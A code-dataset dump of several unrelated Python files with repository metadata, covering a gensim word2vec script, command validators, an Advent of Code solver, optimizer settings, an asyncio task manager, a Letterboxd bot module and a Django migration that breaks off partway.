window=args.window, sample=args.sample, alpha=args.alpha, sg=skipgram,
hs=args.hs, negative=args.negative, cbow_mean=1, epochs=args.iter,
)
if args.output:
outfile = args.output
model.wv.save_word2vec_format(outfile, binary=args.binary)
else:
outfile = args.train.split('.')[0]
model.save(outfile + '.model')
if args.binary == 1:
model.wv.save_word2vec_format(outfile + '.model.bin', binary=True)
else:
model.wv.save_word2vec_format(outfile + '.model.txt', binary=False)
if args.accuracy:
questions_file = args.accuracy
model.accuracy(questions_file)
logger.info("finished running %s", os.path.basename(sys.argv[0]))
| 41.5 | 118 | 0.643574 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""
USAGE: %(program)s -train CORPUS -output VECTORS -size SIZE -window WINDOW
-cbow CBOW -sample SAMPLE -hs HS -negative NEGATIVE -threads THREADS -iter ITER
-min_count MIN-COUNT -alpha ALPHA -binary BINARY -accuracy FILE
Trains a neural embedding model on text file CORPUS.
Parameters essentially reproduce those used by the original C tool
(see https://code.google.com/archive/p/word2vec/).
Parameters for training:
-train <file>
Use text data from <file> to train the model
-output <file>
Use <file> to save the resulting word vectors / word clusters
-size <int>
Set size of word vectors; default is 100
-window <int>
Set max skip length between words; default is 5
-sample <float>
Set threshold for occurrence of words. Those that appear with higher frequency in the training data
will be randomly down-sampled; default is 1e-3, useful range is (0, 1e-5)
-hs <int>
Use Hierarchical Softmax; default is 0 (not used)
-negative <int>
Number of negative examples; default is 5, common values are 3 - 10 (0 = not used)
-threads <int>
Use <int> threads (default 3)
-iter <int>
Run more training iterations (default 5)
-min_count <int>
This will discard words that appear less than <int> times; default is 5
-alpha <float>
Set the starting learning rate; default is 0.025 for skip-gram and 0.05 for CBOW
-binary <int>
Save the resulting vectors in binary moded; default is 0 (off)
-cbow <int>
Use the continuous bag of words model; default is 1 (use 0 for skip-gram model)
-accuracy <file>
Compute accuracy of the resulting model analogical inference power on questions file <file>
See an example of questions file
at https://code.google.com/p/word2vec/source/browse/trunk/questions-words.txt
Example: python -m gensim.scripts.word2vec_standalone -train data.txt \
-output vec.txt -size 200 -sample 1e-4 -binary 0 -iter 3
"""
import logging
import os.path
import sys
import argparse
from numpy import seterr
from gensim.models.word2vec import Word2Vec, LineSentence # avoid referencing __main__ in pickle
logger = logging.getLogger(__name__)
if __name__ == "__main__":
logging.basicConfig(format='%(asctime)s : %(threadName)s : %(levelname)s : %(message)s', level=logging.INFO)
logger.info("running %s", " ".join(sys.argv))
seterr(all='raise') # don't ignore numpy errors
parser = argparse.ArgumentParser()
parser.add_argument("-train", help="Use text data from file TRAIN to train the model", required=True)
parser.add_argument("-output", help="Use file OUTPUT to save the resulting word vectors")
parser.add_argument("-window", help="Set max skip length WINDOW between words; default is 5", type=int, default=5)
parser.add_argument("-size", help="Set size of word vectors; default is 100", type=int, default=100)
parser.add_argument(
"-sample",
help="Set threshold for occurrence of words. "
"Those that appear with higher frequency in the training data will be randomly down-sampled; "
"default is 1e-3, useful range is (0, 1e-5)",
type=float, default=1e-3)
parser.add_argument(
"-hs", help="Use Hierarchical Softmax; default is 0 (not used)",
type=int, default=0, choices=[0, 1]
)
parser.add_argument(
"-negative", help="Number of negative examples; default is 5, common values are 3 - 10 (0 = not used)",
type=int, default=5
)
parser.add_argument("-threads", help="Use THREADS threads (default 3)", type=int, default=3)
parser.add_argument("-iter", help="Run more training iterations (default 5)", type=int, default=5)
parser.add_argument(
"-min_count", help="This will discard words that appear less than MIN_COUNT times; default is 5",
type=int, default=5
)
parser.add_argument(
"-alpha", help="Set the starting learning rate; default is 0.025 for skip-gram and 0.05 for CBOW",
type=float
)
parser.add_argument(
"-cbow", help="Use the continuous bag of words model; default is 1 (use 0 for skip-gram model)",
type=int, default=1, choices=[0, 1]
)
parser.add_argument(
"-binary", help="Save the resulting vectors in binary mode; default is 0 (off)",
type=int, default=0, choices=[0, 1]
)
parser.add_argument("-accuracy", help="Use questions from file ACCURACY to evaluate the model")
args = parser.parse_args()
if args.cbow == 0:
skipgram = 1
if not args.alpha:
args.alpha = 0.025
else:
skipgram = 0
if not args.alpha:
args.alpha = 0.05
corpus = LineSentence(args.train)
model = Word2Vec(
corpus, vector_size=args.size, min_count=args.min_count, workers=args.threads,
window=args.window, sample=args.sample, alpha=args.alpha, sg=skipgram,
hs=args.hs, negative=args.negative, cbow_mean=1, epochs=args.iter,
)
if args.output:
outfile = args.output
model.wv.save_word2vec_format(outfile, binary=args.binary)
else:
outfile = args.train.split('.')[0]
model.save(outfile + '.model')
if args.binary == 1:
model.wv.save_word2vec_format(outfile + '.model.bin', binary=True)
else:
model.wv.save_word2vec_format(outfile + '.model.txt', binary=False)
if args.accuracy:
questions_file = args.accuracy
model.accuracy(questions_file)
logger.info("finished running %s", os.path.basename(sys.argv[0]))
| 0 | 0 | 0 |
fc3ad5daaf48fb4119014f23e24f8ab5e227292c | 2,951 | py | Python | 352/mini-projects/hw3/CENG352_Mini_Project_3_Files/source/validators.py | ysyesilyurt/Metu-CENG | a83fcab00f68e28bda307bb94c060f55042a1389 | [
"MIT"
] | 33 | 2019-03-19T07:51:17.000Z | 2022-03-15T11:04:35.000Z | 352/mini-projects/hw3/CENG352_Mini_Project_3_Files/source/validators.py | ysyesilyurt/Metu-CENG | a83fcab00f68e28bda307bb94c060f55042a1389 | [
"MIT"
] | 1 | 2019-11-09T18:08:21.000Z | 2019-11-09T18:08:21.000Z | 352/mini-projects/hw3/CENG352_Mini_Project_3_Files/source/validators.py | ysyesilyurt/Metu-CENG | a83fcab00f68e28bda307bb94c060f55042a1389 | [
"MIT"
] | 13 | 2019-11-08T06:18:21.000Z | 2022-01-07T17:17:38.000Z | import messages
"""
This validator is basic validator that returns (True, None)
when a user is authenticated and the number of command tokens is 1.
Returns (False, <message>) otherwise.
"""
| 29.808081 | 76 | 0.689258 | import messages
def sign_up_validator(auth_customer, cmd_tokens):
# disregard already signed in users
if auth_customer:
return False, messages.USER_ALREADY_SIGNED_IN
# sign_up <email> <password> <first_name> <last_name> <plan_id>
elif len(cmd_tokens) == 6:
return True, None
else:
return False, messages.CMD_NOT_ENOUGH_ARGS % 5
def sign_in_validator(auth_customer, cmd_tokens):
# disregard already signed in users
if auth_customer:
if auth_customer.email == cmd_tokens[1]:
return None, messages.USER_ALREADY_SIGNED_IN
else:
return None, messages.USER_OTHER_SIGNED_IN
# sign_in <email> <password>
elif len(cmd_tokens) == 3:
return True, None
else:
return False, messages.CMD_NOT_ENOUGH_ARGS % 2
"""
This validator is basic validator that returns (True, None)
when a user is authenticated and the number of command tokens is 1.
Returns (False, <message>) otherwise.
"""
def basic_validator(auth_customer, cmd_tokens):
# only accept signed in users
if auth_customer:
return True, None
elif not auth_customer and len(cmd_tokens) == 1:
return False, messages.USER_NOT_AUTHORIZED
else:
return False, messages.CMD_INVALID_ARGS
def sign_out_validator(auth_customer, cmd_tokens):
return basic_validator(auth_customer, cmd_tokens)
def quit_validator(cmd_tokens):
if len(cmd_tokens) == 1:
return True, None
else:
return False, messages.CMD_INVALID_ARGS
def show_plans_validator(auth_customer, cmd_tokens):
return basic_validator(auth_customer, cmd_tokens)
def show_subscription_validator(auth_customer, cmd_tokens):
return basic_validator(auth_customer, cmd_tokens)
def watched_movies_validator(auth_customer, cmd_tokens):
if not auth_customer:
return False, messages.USER_NOT_AUTHORIZED
elif len(cmd_tokens) <= 1:
return False, messages.CMD_NOT_ENOUGH_ARGS_AT_LEAST % 1
else:
return True, None
def subscribe_validator(auth_customer, cmd_tokens):
# only accept signed in users
if not auth_customer:
return False, messages.USER_NOT_AUTHORIZED
# subscribe <plan_id>
elif len(cmd_tokens) == 2:
return True, None
else:
return False, messages.CMD_NOT_ENOUGH_ARGS % 1
def search_for_movies_validator(auth_customer, cmd_tokens):
# only accept signed in users
if not auth_customer:
return False, messages.USER_NOT_AUTHORIZED
# search_for_movies <keyword_1> <keyword_2> <keyword_3> ... <keyword_n>
elif len(cmd_tokens) > 1:
return True, None
else:
return False, messages.CMD_NOT_ENOUGH_ARGS_AT_LEAST % 1
def suggest_movies_validator(auth_customer, cmd_tokens):
return basic_validator(auth_customer, cmd_tokens)
| 2,441 | 0 | 275 |
f72ac585b2ba49e680b69313a2fa0d0a5d6a749c | 137 | py | Python | Python/Regex and Parsing/Validating Roman Numerals/Solution.py | PawarAditi/HackerRank | fcd9d1450ee293372ce5f1d4a3b7284ecf472657 | [
"MIT"
] | 219 | 2018-06-17T19:47:22.000Z | 2022-03-27T15:28:56.000Z | Python/Regex and Parsing/Validating Roman Numerals/Solution.py | PawarAditi/HackerRank | fcd9d1450ee293372ce5f1d4a3b7284ecf472657 | [
"MIT"
] | 2 | 2020-08-12T16:47:41.000Z | 2020-12-15T17:05:57.000Z | Python/Regex and Parsing/Validating Roman Numerals/Solution.py | PawarAditi/HackerRank | fcd9d1450ee293372ce5f1d4a3b7284ecf472657 | [
"MIT"
] | 182 | 2018-12-12T21:36:50.000Z | 2022-03-26T17:49:51.000Z | import re
regex_pattern = r'M{0,3}(C[MD]|D?C{0,3})(X[CL]|L?X{0,3})(I[VX]|V?I{0,3})$'
print(str(bool(re.match(regex_pattern, input())))) | 27.4 | 74 | 0.605839 | import re
regex_pattern = r'M{0,3}(C[MD]|D?C{0,3})(X[CL]|L?X{0,3})(I[VX]|V?I{0,3})$'
print(str(bool(re.match(regex_pattern, input())))) | 0 | 0 | 0 |
8791a7ba3ffc3a49544214256a6f8aed850b1945 | 4,232 | py | Python | Day12/12_passage_pathing.py | schca675/my-code-for-advent-of-code-2021 | e8bdb986930b444884d37e679a37ed25efe2b34e | [
"Apache-2.0"
] | null | null | null | Day12/12_passage_pathing.py | schca675/my-code-for-advent-of-code-2021 | e8bdb986930b444884d37e679a37ed25efe2b34e | [
"Apache-2.0"
] | null | null | null | Day12/12_passage_pathing.py | schca675/my-code-for-advent-of-code-2021 | e8bdb986930b444884d37e679a37ed25efe2b34e | [
"Apache-2.0"
] | null | null | null | # --- Day 12: Passage Pathing ---
import copy
print("TEST")
resolve_puzzle("test_data.txt")
print("PUZZLE")
resolve_puzzle("data.txt") ## takes a while (<1min) --> not very efficient | 41.490196 | 133 | 0.624764 | # --- Day 12: Passage Pathing ---
import copy
class Path:
def __init__(self, cave, steps_taken, next_step, has_visited_lower_caves, lower_case_visited_twice):
self.lower_cave_visited_twice = lower_case_visited_twice
self.has_visited_lower_caves = has_visited_lower_caves
if len(has_visited_lower_caves) == 0:
self.lower_cave_visited_twice = False
for node in cave.nodes:
# set all nodes to False, upper-case ones will stay false
self.has_visited_lower_caves[node] = 0
# if it is a lower case step: increase number of times it was visited
if next_step == next_step.lower():
self.has_visited_lower_caves[next_step] += 1
if self.has_visited_lower_caves[next_step] == 2:
self.lower_cave_visited_twice = True
self.steps_taken = steps_taken
self.steps_taken.append(next_step)
def can_steps_be_taken(self, next_step):
if next_step != next_step.lower():
# upper case steps can always be taken
return True
if next_step == "start":
return False
if self.lower_cave_visited_twice:
return self.has_visited_lower_caves[next_step] == 0
return self.has_visited_lower_caves[next_step] <= 1
class Path_part1:
def __init__(self, cave, steps_taken, next_step, has_visited_lower_caves):
self.has_visited_lower_caves = has_visited_lower_caves
if len(has_visited_lower_caves) == 0:
for node in cave.nodes:
# set all nodes to False, upper-case ones will stay false
self.has_visited_lower_caves[node] = False
# if it is a lower case step: set it to true if that is the next step
if next_step == next_step.lower():
self.has_visited_lower_caves[next_step] = True
self.steps_taken = steps_taken
self.steps_taken.append(next_step)
class Cave:
def __init__(self, nodes, edges):
self.nodes = nodes
self.edges = edges # tuples (a, b) connections
self.neighbours = dict() # node --> neighbours
for edge in self.edges:
conn_a = self.neighbours.get(edge[0], set())
conn_a.add(edge[1])
conn_b = self.neighbours.get(edge[1], set())
conn_b.add(edge[0])
self.neighbours[edge[0]] = conn_a
self.neighbours[edge[1]] = conn_b
def get_all_paths(self, paths_so_far):
all_paths = []
for path in paths_so_far:
updated_paths = []
# if path has reached end --> skip
if path.steps_taken[-1] == 'end':
# end is reached, so we attach it to all paths without next steps
all_paths.append(path)
continue
# Else: Check next steps and add those to final list
for poss_steps in self.neighbours[path.steps_taken[-1]]:
# if not path.has_visited_lower_caves[poss_steps]: ## for part 1
if path.can_steps_be_taken(poss_steps):
# new_path = Path(self, copy.deepcopy(path.steps_taken), poss_steps, copy.deepcopy(path.has_visited_lower_caves))
new_path = Path(self, copy.deepcopy(path.steps_taken), poss_steps,
copy.deepcopy(path.has_visited_lower_caves), copy.deepcopy(path.lower_cave_visited_twice))
updated_paths.append(new_path)
all_paths.extend(self.get_all_paths(updated_paths))
return all_paths
def get_puzzle_input(filepath):
nodes = set()
edges = set()
with open(filepath) as f:
for line in f:
[node_1, node_2] = line.rstrip().split('-')
nodes.add(node_1)
nodes.add(node_2)
edges.add((node_1, node_2))
return Cave(nodes, edges)
def resolve_puzzle(filepath):
cave = get_puzzle_input(filepath)
paths = cave.get_all_paths([Path(cave, [], 'start', dict(), False)])
print("PUZZLE SOLUTION: {} unique paths".format(len(paths)))
print("TEST")
resolve_puzzle("test_data.txt")
print("PUZZLE")
resolve_puzzle("data.txt") ## takes a while (<1min) --> not very efficient | 3,819 | -24 | 247 |
5e0f6f4ca343035446ce4d5b7cee2f2840ba7722 | 2,627 | py | Python | optimization_tutorial/optimizers/parameters_dicts.py | gniqeh/optimization-tutorial | f72f7c08a3e857ed36c4b3973f0164862680a3de | [
"MIT"
] | null | null | null | optimization_tutorial/optimizers/parameters_dicts.py | gniqeh/optimization-tutorial | f72f7c08a3e857ed36c4b3973f0164862680a3de | [
"MIT"
] | null | null | null | optimization_tutorial/optimizers/parameters_dicts.py | gniqeh/optimization-tutorial | f72f7c08a3e857ed36c4b3973f0164862680a3de | [
"MIT"
] | null | null | null | epsilon_d_ = {
"epsilon": ["float", "0.03", "0.01 ... 0.3"],
}
distribution_d_ = {
"distribution": ["string", "normal", "normal, laplace, logistic, gumbel"],
}
n_neighbours_d_ = {
"n_neighbours": ["int", "3", "1 ... 10"],
}
p_accept_d_ = {
"p_accept": ["float", "0.1", "0.01 ... 0.3"],
}
repulsion_factor_d = {
"repulsion_factor": ["float", "5", "2 ... 10"],
}
annealing_rate_d = {
"annealing_rate": ["float", "0.97", "0.9 ... 0.99"],
}
start_temp_d = {
"start_temp": ["float", "1", "0.5 ... 1.5"],
}
alpha_d = {
"alpha": ["float", "1", "0.5 ... 2"],
}
gamma_d = {
"gamma": ["float", "2", "0.5 ... 5"],
}
beta_d = {
"beta": ["float", "0.5", "0.25 ... 3"],
}
sigma_d = {
"sigma": ["float", "0.5", "0.25 ... 3"],
}
step_size_d = {
"step_size": ["int", "1", "1 ... 1000"],
}
n_iter_restart_d = {
"n_iter_restart": ["int", "10", "5 ... 20"],
}
iters_p_dim_d = {
"iters_p_dim": ["int", "10", "5 ... 15"],
}
n_positions_d = {
"n_positions": ["int", "4", "2 ... 8"],
}
pattern_size_d = {
"pattern_size": ["float", "0.25", "0.1 ... 0.5"],
}
reduction_d = {
"reduction": ["float", "0.9", "0.75 ... 0.99"],
}
population_parallel_temp_d = {
"population": ["int", "5", "3 ... 15"],
}
n_iter_swap_parallel_temp_d = {
"n_iter_swap": ["int", "10", "5 ... 15"],
}
population_pso_d = {
"population": ["int", "10", "4 ... 15"],
}
inertia_d = {
"inertia": ["float", "0.5", "0.25 ... 0.75"],
}
cognitive_weight_d = {
"cognitive_weight": ["float", "0.5", "0.25 ... 0.75"],
}
social_weight_d = {
"social_weight": ["float", "0.5", "0.25 ... 0.75"],
}
temp_weight_d = {
"temp_weight": ["float", "0.2", "0.05 ... 0.3"],
}
population_evo_strat_d = {
"population": ["int", "10", "4 ... 15"],
}
mutation_rate_d = {
"mutation_rate": ["float", "0.7", "0.1 ... 0.9"],
}
crossover_rate_d = {
"crossover_rate": ["float", "0.3", "0.1 ... 0.9"],
}
gpr_bayes_opt_d = {
"gpr": ["class", "0.3", "-"],
}
xi_bayes_opt_d = {
"xi": ["float", "0.3", "0.1 ... 0.9"],
}
warm_start_smbo_d = {
"warm_start_smbo": ["pandas dataframe", "None", "-"],
}
max_sample_size_d = {
"max_sample_size": ["int", "10000000", "-"],
}
sampling_d = {
"sampling": ["dict", "{'random': 1000000}", "-"],
}
gamma_tpe_d = {
"gamma_tpe": ["float", "0.2", "0.05 ... 0.75"],
}
tree_regressor_d = {
"tree_regressor": [
"string",
"extra_tree",
"extra_tree, random_forest, gradient_boost",
],
}
tree_para_d = {
"tree_para": ["dict", "{'n_estimators': 100}", "-"],
}
xi_forest_opt_d = {
"xi": ["float", "0.03", "0.001 ... 0.1"],
}
| 23.247788 | 78 | 0.50552 | epsilon_d_ = {
"epsilon": ["float", "0.03", "0.01 ... 0.3"],
}
distribution_d_ = {
"distribution": ["string", "normal", "normal, laplace, logistic, gumbel"],
}
n_neighbours_d_ = {
"n_neighbours": ["int", "3", "1 ... 10"],
}
p_accept_d_ = {
"p_accept": ["float", "0.1", "0.01 ... 0.3"],
}
repulsion_factor_d = {
"repulsion_factor": ["float", "5", "2 ... 10"],
}
annealing_rate_d = {
"annealing_rate": ["float", "0.97", "0.9 ... 0.99"],
}
start_temp_d = {
"start_temp": ["float", "1", "0.5 ... 1.5"],
}
alpha_d = {
"alpha": ["float", "1", "0.5 ... 2"],
}
gamma_d = {
"gamma": ["float", "2", "0.5 ... 5"],
}
beta_d = {
"beta": ["float", "0.5", "0.25 ... 3"],
}
sigma_d = {
"sigma": ["float", "0.5", "0.25 ... 3"],
}
step_size_d = {
"step_size": ["int", "1", "1 ... 1000"],
}
n_iter_restart_d = {
"n_iter_restart": ["int", "10", "5 ... 20"],
}
iters_p_dim_d = {
"iters_p_dim": ["int", "10", "5 ... 15"],
}
n_positions_d = {
"n_positions": ["int", "4", "2 ... 8"],
}
pattern_size_d = {
"pattern_size": ["float", "0.25", "0.1 ... 0.5"],
}
reduction_d = {
"reduction": ["float", "0.9", "0.75 ... 0.99"],
}
population_parallel_temp_d = {
"population": ["int", "5", "3 ... 15"],
}
n_iter_swap_parallel_temp_d = {
"n_iter_swap": ["int", "10", "5 ... 15"],
}
population_pso_d = {
"population": ["int", "10", "4 ... 15"],
}
inertia_d = {
"inertia": ["float", "0.5", "0.25 ... 0.75"],
}
cognitive_weight_d = {
"cognitive_weight": ["float", "0.5", "0.25 ... 0.75"],
}
social_weight_d = {
"social_weight": ["float", "0.5", "0.25 ... 0.75"],
}
temp_weight_d = {
"temp_weight": ["float", "0.2", "0.05 ... 0.3"],
}
population_evo_strat_d = {
"population": ["int", "10", "4 ... 15"],
}
mutation_rate_d = {
"mutation_rate": ["float", "0.7", "0.1 ... 0.9"],
}
crossover_rate_d = {
"crossover_rate": ["float", "0.3", "0.1 ... 0.9"],
}
gpr_bayes_opt_d = {
"gpr": ["class", "0.3", "-"],
}
xi_bayes_opt_d = {
"xi": ["float", "0.3", "0.1 ... 0.9"],
}
warm_start_smbo_d = {
"warm_start_smbo": ["pandas dataframe", "None", "-"],
}
max_sample_size_d = {
"max_sample_size": ["int", "10000000", "-"],
}
sampling_d = {
"sampling": ["dict", "{'random': 1000000}", "-"],
}
gamma_tpe_d = {
"gamma_tpe": ["float", "0.2", "0.05 ... 0.75"],
}
tree_regressor_d = {
"tree_regressor": [
"string",
"extra_tree",
"extra_tree, random_forest, gradient_boost",
],
}
tree_para_d = {
"tree_para": ["dict", "{'n_estimators': 100}", "-"],
}
xi_forest_opt_d = {
"xi": ["float", "0.03", "0.001 ... 0.1"],
}
| 0 | 0 | 0 |
34998dafee2d5b0abab5b24a8a1a045fcb034d90 | 3,173 | py | Python | mt/base/aio/procedure.py | inteplus/mtbase | b211f25110f95be8b78be3e44feb1c16789c13b8 | [
"MIT"
] | null | null | null | mt/base/aio/procedure.py | inteplus/mtbase | b211f25110f95be8b78be3e44feb1c16789c13b8 | [
"MIT"
] | null | null | null | mt/base/aio/procedure.py | inteplus/mtbase | b211f25110f95be8b78be3e44feb1c16789c13b8 | [
"MIT"
] | null | null | null | '''Asynchronous procedure.
An asynchronous procedure, a.k.a. an aproc, is a procedure that is asynchronous and has been
wrapped into an :class:`asyncio.Future`. A procedure is a function that returns None.
'''
import asyncio
__all__ = ['AprocManager']
class AprocManager:
'''Manages the completion of aprocs.
With this manager, the user can just send an aproc to it and forget. To ensure all aprocs
are completed, please invoke the cleanup function. Otherwise, some aprocs may never get
awaited when the manager dies.
Parameters
----------
max_concurrency : int
maximum number of concurrent aprocs that can be held pending
handle_exception : {'raise', 'silent', 'warn'}
policy for handling an exception raised by an aproc. If 'raise', re-raise the caught
exception. If 'silent', ignore the exception. If 'warn', use the provided logger to
warn the user.
logger : logging.Logger or equivalent
logger for warning purposes
'''
async def send(self, aproc: asyncio.Future):
'''Sends an aproc to the manager so the user can forget about it.
The function usually returns immediately. However, if the maximum number of concurrent
aprocs has been exceeded. It will await.
Parameters
----------
aproc : asyncio.Future
a future (returned via :func:`asyncio.create_task` or :func:`asyncio.ensure_future`)
that is a procedure
'''
await self._sleep_well()
self.aproc_set.add(aproc)
async def cleanup(self):
'''Awaits until all aprocs are done.'''
await self._sleep_well(1)
| 39.6625 | 109 | 0.6341 | '''Asynchronous procedure.
An asynchronous procedure, a.k.a. an aproc, is a procedure that is asynchronous and has been
wrapped into an :class:`asyncio.Future`. A procedure is a function that returns None.
'''
import asyncio
__all__ = ['AprocManager']
class AprocManager:
'''Manages the completion of aprocs.
With this manager, the user can just send an aproc to it and forget. To ensure all aprocs
are completed, please invoke the cleanup function. Otherwise, some aprocs may never get
awaited when the manager dies.
Parameters
----------
max_concurrency : int
maximum number of concurrent aprocs that can be held pending
handle_exception : {'raise', 'silent', 'warn'}
policy for handling an exception raised by an aproc. If 'raise', re-raise the caught
exception. If 'silent', ignore the exception. If 'warn', use the provided logger to
warn the user.
logger : logging.Logger or equivalent
logger for warning purposes
'''
def __init__(self, max_concurrency: int = 1024, handle_exception: str = 'raise', logger=None):
self.max_concurrency = max_concurrency
self.aproc_set = set()
self.handle_exception = handle_exception
self.logger = logger
if handle_exception == 'warn' and logger is None:
raise ValueError("A logger must be provided if keyword 'handle_exception' is set to 'warn'.")
async def _sleep_well(self, max_concurrency=None):
max_concurrency = self.max_concurrency if max_concurrency is None else 1
while len(self.aproc_set) >= max_concurrency:
done_set, completed_set = await asyncio.wait(self.aproc_set, return_when=asyncio.FIRST_COMPLETED)
for task in done_set:
if task.cancelled():
if self.handle_exception == 'raise':
raise asyncio.CancelledError("An aproc has been cancelled.")
if self.handle_exception == 'warn':
self.logger.warn("An aproc has been cancelled: {}.".format(task))
elif task.exception() is not None:
if self.handle_exception == 'raise':
raise task.exception()
if self.handle_exception == 'warn':
self.logger.warn("An exception has been caught (and ignored) in an aproc.")
self.logger.warn(str(task.exception()))
self.aproc_set = completed_set
async def send(self, aproc: asyncio.Future):
'''Sends an aproc to the manager so the user can forget about it.
The function usually returns immediately. However, if the maximum number of concurrent
aprocs has been exceeded. It will await.
Parameters
----------
aproc : asyncio.Future
a future (returned via :func:`asyncio.create_task` or :func:`asyncio.ensure_future`)
that is a procedure
'''
await self._sleep_well()
self.aproc_set.add(aproc)
async def cleanup(self):
'''Awaits until all aprocs are done.'''
await self._sleep_well(1)
| 1,444 | 0 | 54 |
8274136679ce63a74786a5d2b3687fe982c83c08 | 2,005 | py | Python | hypno.py | Leonidas-from-XIV/sandbox | ca1f53d4ba1c27be4397c18bf3d5a2ccf9db6a50 | [
"WTFPL"
] | null | null | null | hypno.py | Leonidas-from-XIV/sandbox | ca1f53d4ba1c27be4397c18bf3d5a2ccf9db6a50 | [
"WTFPL"
] | null | null | null | hypno.py | Leonidas-from-XIV/sandbox | ca1f53d4ba1c27be4397c18bf3d5a2ccf9db6a50 | [
"WTFPL"
] | null | null | null | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
import math
import gtk, gobject
import gnomecanvas
if __name__ == '__main__':
main()
| 29.925373 | 70 | 0.573566 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
import math
import gtk, gobject
import gnomecanvas
class HypnoticWindow(object):
def __init__(self, width, height):
self.window = gtk.Window()
self.window.set_title('Spiral')
self.window.connect('delete_event', gtk.main_quit)
self.width, self.height = width, height
self.orientation = 0
self.canvas = gnomecanvas.Canvas()
self.canvas.set_size_request(width, height)
self.canvas.set_scroll_region(0, 0, width, height)
self.window.add(self.canvas)
back = self.canvas.root().add(gnomecanvas.CanvasRect,
fill_color='white', x1=0, y1=0, x2=width, y2=height)
self.bpath = self.canvas.root().add(gnomecanvas.CanvasBpath,
outline_color='black', width_pixels=3)
self.window.show_all()
def create_spiral(self):
"""rotate takes an angle in radian."""
self.path = [
(self.width / 2, self.height / 2)
]
a = 0.03
t = 0.0
while True:
r = a * t
angle = t + self.orientation
x = r * math.cos(angle) * 200
y = r * math.sin(angle) * 200
# are we still inside the canvas size?
if x > self.width / 2 and y > self.height / 2:
break
self.path.append((x + 200, y + 200))
t += 0.1
self.render_path(self.path)
def render_path(self, path):
commands = [(gnomecanvas.MOVETO_OPEN, path[0][0], path[0][1])]
commands += [(gnomecanvas.LINETO, x, y) for x, y in path[1:]]
path_def = gnomecanvas.path_def_new(commands)
self.bpath.set_bpath(path_def)
def rotate(self, angle):
self.orientation += angle
self.create_spiral()
return True
def main():
win = HypnoticWindow(400, 400)
win.create_spiral()
gobject.timeout_add(10, win.rotate, 0.1)
gtk.main()
if __name__ == '__main__':
main()
| 1,140 | 683 | 46 |
0c3a35ed3caed81730d5c1e91525115e25c0ced4 | 2,954 | py | Python | crew.py | koenhagen/lb-bot | 8433a401fe1d2d3237f8a8a028bb5ed4298e280d | [
"MIT"
] | 10 | 2021-01-27T01:55:38.000Z | 2022-02-04T06:09:31.000Z | crew.py | koenhagen/lb-bot | 8433a401fe1d2d3237f8a8a028bb5ed4298e280d | [
"MIT"
] | null | null | null | crew.py | koenhagen/lb-bot | 8433a401fe1d2d3237f8a8a028bb5ed4298e280d | [
"MIT"
] | 5 | 2021-01-17T21:33:34.000Z | 2022-02-13T19:58:45.000Z | from api import api_call
from config import SETTINGS
from helpers import create_embed, LetterboxdError
| 37.392405 | 78 | 0.63981 | from api import api_call
from config import SETTINGS
from helpers import create_embed, LetterboxdError
async def crew_embed(input_name, cmd_alias):
lbxd_id = __check_if_fixed_search(input_name)
person_json = await __search_letterboxd(input_name, cmd_alias, lbxd_id)
description, name, url, tmdb_id = __get_details(person_json)
api_url = 'https://api.themoviedb.org/3/person/{}'.format(tmdb_id)
description += await __get_dates(api_url)
picture = await __get_picture(api_url)
return create_embed(name, url, description, picture)
def __check_if_fixed_search(keywords):
for name, lbxd_id in SETTINGS['fixed_crew_search'].items():
if name.lower() == keywords.lower():
return lbxd_id
return ''
async def __search_letterboxd(item, cmd_alias, lbxd_id):
if lbxd_id:
person_json = await api_call('contributor/' + lbxd_id)
else:
params = {'input': item, 'include': 'ContributorSearchItem'}
if cmd_alias in ['actress', 'actor']:
params['contributionType'] = 'Actor'
elif cmd_alias == 'director':
params['contributionType'] = 'Director'
response = await api_call('search', params)
if not response['items']:
raise LetterboxdError('No person was found with this search.')
person_json = response['items'][0]['contributor']
return person_json
def __get_details(person_json):
for link in person_json['links']:
if link['type'] == 'tmdb':
tmdb_id = link['id']
elif link['type'] == 'letterboxd':
url = link['url']
description = ''
for contrib_stats in person_json['statistics']['contributions']:
description += '**' + contrib_stats['type'] + ':** '
description += str(contrib_stats['filmCount']) + '\n'
return description, person_json['name'], url, tmdb_id
async def __get_dates(api_url):
details_text = ''
url = api_url + '?api_key={}'.format(SETTINGS['tmdb'])
person_tmdb = await api_call(url, None, False)
for element in person_tmdb:
if not person_tmdb[element]:
continue
if element == 'birthday':
details_text += '**Birthday:** ' + person_tmdb[element] + '\n'
elif element == 'deathday':
details_text += '**Day of Death:** ' + person_tmdb[element] + '\n'
elif element == 'place_of_birth':
details_text += '**Place of Birth:** ' + person_tmdb[element]
return details_text
async def __get_picture(api_url):
api_url += '/images?api_key=' + SETTINGS['tmdb']
person_img = await api_call(api_url, None, False)
if not person_img or not person_img['profiles']:
return ''
highest_vote = 0
for img in person_img['profiles']:
if img['vote_average'] >= highest_vote:
highest_vote = img['vote_average']
path = img['file_path']
return 'https://image.tmdb.org/t/p/w200' + path
| 2,707 | 0 | 138 |
46d4cfc2a4ae2b3653dbb6e24c91be1e5c58e672 | 1,725 | py | Python | systori/apps/company/migrations/0002_auto_20190730_2210.py | systori/systori | e309c63e735079ff6032fdaf1db354ec872b28b1 | [
"BSD-3-Clause"
] | 12 | 2018-01-30T00:44:06.000Z | 2020-07-13T05:20:48.000Z | systori/apps/company/migrations/0002_auto_20190730_2210.py | systori/systori | e309c63e735079ff6032fdaf1db354ec872b28b1 | [
"BSD-3-Clause"
] | 36 | 2018-03-06T17:49:50.000Z | 2020-06-23T19:26:00.000Z | systori/apps/company/migrations/0002_auto_20190730_2210.py | systori/systori | e309c63e735079ff6032fdaf1db354ec872b28b1 | [
"BSD-3-Clause"
] | 3 | 2018-08-03T07:03:09.000Z | 2020-07-09T20:21:10.000Z | # Generated by Django 2.0.13 on 2019-07-30 20:10
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
from postgres_schema.operations import RunInPublic
| 28.75 | 68 | 0.496232 | # Generated by Django 2.0.13 on 2019-07-30 20:10
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
from postgres_schema.operations import RunInPublic
class Migration(migrations.Migration):
initial = True
dependencies = [
("company", "0001_initial"),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
RunInPublic(
migrations.AddField(
model_name="worker",
name="user",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="access",
